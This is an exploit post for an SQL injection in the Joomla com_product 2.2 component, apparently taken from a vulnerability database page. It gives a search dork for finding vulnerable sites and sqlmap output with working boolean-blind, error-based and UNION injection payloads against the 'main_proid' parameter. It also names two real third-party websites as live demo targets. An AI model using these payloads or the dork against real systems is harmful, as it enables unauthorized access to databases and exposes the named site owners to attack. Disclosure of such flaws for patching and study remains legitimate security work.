Joomla com_product 2.2 SQL injection Vulnerability

2017.03.11
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:index.php?option=com_product

############################## # [xBADGIRL21] # # [N3W PUBLIC 3XPL0IT] # # _,________ # # 0day _T _==____() -- # # /##(_)-' # # /##/ # # x21 # ############################## # Exploit Title : Joomla com_product 2.2 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_product # version : 2.2 # Tested on: [WIN7] # MyBlog : http://xbadgirl21.blogspot.com # Date: 10-03-2017 # video Proof : https://youtu.be/nxtkKvz6wrY [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz ###################### #|X|B|A|D|G|I|R|L|2|1| ###################### # [+] Poc : ###################### # [main_proid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10 ###################### # [+] SQLmap PoC: ###################### Parameter: main_proid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: main_proid=10 AND 2715=2715 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: main_proid=10 AND (SELECT 7268 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(7268=7268,1))),0x7171717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: main_proid=10 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7747466f6c77734d4f614a62786d4a646b7257686c71464173706c6d4f4d6c644a67507765454954,0x7171717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- umHw --- # GET parameter 'main_proid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [!] Live Demo : ###################### # http://www.powerbear.ae/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10 # http://www.germandistribution.com/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien

References:

https://youtu.be/nxtkKvz6wrY


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top